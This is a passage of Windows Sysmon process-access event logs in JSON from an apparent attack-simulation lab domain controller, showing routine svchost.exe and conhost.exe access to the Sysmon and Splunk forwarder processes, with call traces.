C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:26.413","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3101,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:26.413\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:26.413","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3102,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:26.413\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:26.413","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3103,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:26.413\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:26.413","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3104,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:26.413\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:26.413","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3105,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:26.413\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:26.413","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3106,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:26.413\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:26.413","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3107,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:26.413\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:26.413","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3108,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:26.413\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-10EE-5F25-0000-001047420500}\r\nTargetProcessId: 4536\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 